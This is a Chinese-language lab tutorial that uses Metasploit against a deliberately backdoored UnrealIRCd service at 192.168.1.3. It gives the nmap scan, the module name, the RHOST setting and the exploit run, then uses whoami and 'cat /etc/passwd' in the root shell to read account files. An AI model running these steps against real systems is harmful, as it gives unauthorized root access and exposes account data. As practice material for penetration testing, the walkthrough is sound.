Metasploit溢出UnrealIRCd后門漏洞

發(fā)布時間：2020-10-06 06:02:39 來源：網(wǎng)絡閱讀：1790 作者：白帽生活欄目：安全技術

利用UnrealIRCd后門漏洞，獲取目標主機的root權(quán)限。

某些站點的UnrealIRCd，在DEBUG3_DOLOG_SYSTEM宏中包含外部引入的惡意代碼，遠程***者能夠執(zhí)行任意代碼。

一、利用nmap工具掃描目標主機

1.1使用nmap命令對目標主機進行掃描。單擊桌面空白處，右鍵菜單選擇“在終端中打開”。

1.2在終端中輸入命令“nmap –sV 192.168.1.3”，對目標主機進行端口掃描，發(fā)現(xiàn)開放6667端口,對應的服務為unreal ircd。

Metasploit溢出UnrealIRCd后門漏洞

1.3在終端中輸入命令“msfconsole”，啟動MSF終端。

Metasploit溢出UnrealIRCd后門漏洞

1.4在終端中輸入命令“search unreal ircd”，搜索ircd的相關工具和***載荷。

Metasploit溢出UnrealIRCd后門漏洞

1.5在終端中輸入命令“use exploit/unix/irc/unreal_ircd_3281_backdoor”，啟用漏洞利用模塊, 提示符就會提示進入到該路徑下。

Metasploit溢出UnrealIRCd后門漏洞

1.6在終端中輸入命令“show options”，查看需要設置的相關項，“yes”表示必須填寫的參數(shù)。

1.7在終端中輸入命令“set RHOST 192.168.1.3”，設置目標主機的IP地址。

Metasploit溢出UnrealIRCd后門漏洞

1.8在終端中輸入“exploit”, 開始向目標主機***，***成功后，建立shell會話。

1.9在終端中輸入“whoami”,查看獲得的權(quán)限為root，輸入命令“cat /etc/passwd”,查看系統(tǒng)的帳號和密碼。

Metasploit溢出UnrealIRCd后門漏洞

向AI問一下細節(jié)

猜你喜歡